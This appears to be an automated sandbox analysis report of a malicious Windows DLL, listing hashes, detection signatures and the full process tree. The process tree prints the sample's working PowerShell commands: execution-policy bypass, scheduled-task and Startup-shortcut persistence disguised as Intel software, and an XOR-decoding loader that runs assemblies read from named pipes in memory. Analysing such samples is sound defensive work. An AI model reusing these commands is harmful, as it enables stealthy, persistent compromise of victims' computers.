Windows
Analysis Report
uEhN67huiV.dll
Overview
General Information
Sample name: | uEhN67huiV.dll (renamed because original name is a hash value) |
Original sample name: | 6d54f141eb720b107b479bf46db29af4df2b96fe090b3ddaf835b3a1d1ed40a1.dll.exe |
Analysis ID: | 1576676 |
MD5: | 217191ece640821660fb91ccda6e3422 |
SHA1: | a0237e393079a306f70bd436c15c5b7abb4e8a23 |
SHA256: | 6d54f141eb720b107b479bf46db29af4df2b96fe090b3ddaf835b3a1d1ed40a1 |
Tags: | exe, user-JAMESWT_MHT |
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- loaddll64.exe (PID: 5864 cmdline: loaddll64.exe "C:\Users\user\Desktop\uEhN67huiV.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
- conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6256 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- rundll32.exe (PID: 4464 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 5728 cmdline: rundll32.exe C:\Users\user\Desktop\uEhN67huiV.dll,DllMainer MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 3760 cmdline: rundll32.exe C:\Users\user\Desktop\uEhN67huiV.dll,DllMainerInstall MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 5900 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 3780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 3920 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 4640 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3800 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 4808 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- powershell.exe (PID: 5040 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7236 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- rundll32.exe (PID: 7128 cmdline: rundll32.exe C:\Users\user\Desktop\uEhN67huiV.dll,DllMainerInstallUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 7248 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7320 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementEngine.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management Engine (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save() MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7468 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DllMainer MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7476 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DllMainerInstall MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 8048 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 5040 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7568 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7284 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 6340 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- powershell.exe (PID: 6340 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll,DllMainerUserOnly MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7456 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll,DllMainerUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- powershell.exe (PID: 7964 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7904 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- rundll32.exe (PID: 7500 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DllMainerInstallUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 7332 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6348 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementEngine.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management Engine (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save() MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",Dummy MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7532 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
- WerFault.exe (PID: 7248 cmdline: C:\Windows\system32\WerFault.exe -u -p 7532 -s 380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- rundll32.exe (PID: 7588 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DllMainerUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- powershell.exe (PID: 1092 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Write-Host 'Dummy process started. Press Ctrl+C to exit.'; while ($true) { try { Start-Sleep -Seconds 1 } catch { Write-Host 'Close signal received. Exiting...'; break } }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2748 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"KKVXTTALMQKJXGHUIVTMRYXKTCBLJUKGSQAQQVCIJOFAURCWCUVMXEFSEJMVMLDXFVKVWCOUGOEFXUIAFLXQWLRVMBMINXCLXXAVVAAVCFUXMRVSFXWSANYMHNFPSBTH\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 156160;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 21504;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7412 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"GAPFBYMIIDIBSAEOJYHVNMUBOXJFHRPWIKEMMVHMQAIKDKJRKXOSBPHHNMWOEEEJRHQHVBHYURUJGAMRGLBSYRATIKWBUSQSMIGFPYGIWGHYEQXNWKONXLKOEGPRSYLY\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 156160;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 18944;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1836 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"XYKYPLGRXTLBHRLAALQLRMGCAAMJSFVPYFKBDUULYXQVIELTAYFOOSCVDDLHPVLLLCDLHUSNKBXMDCNMHKHJKREYMAPWJPKLUCBWLYEHVPMJNWJGCMLNFSWYRQOIAAIQ\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 3887104;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7604 cmdline: rundll32.exe "C:\Users\user\Desktop\uEhN67huiV.dll",DllMainerSmartAndSilent MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
No configs have been found
No yara matches
System Summary |
---|
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
Source: | Author: frack113 |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems) |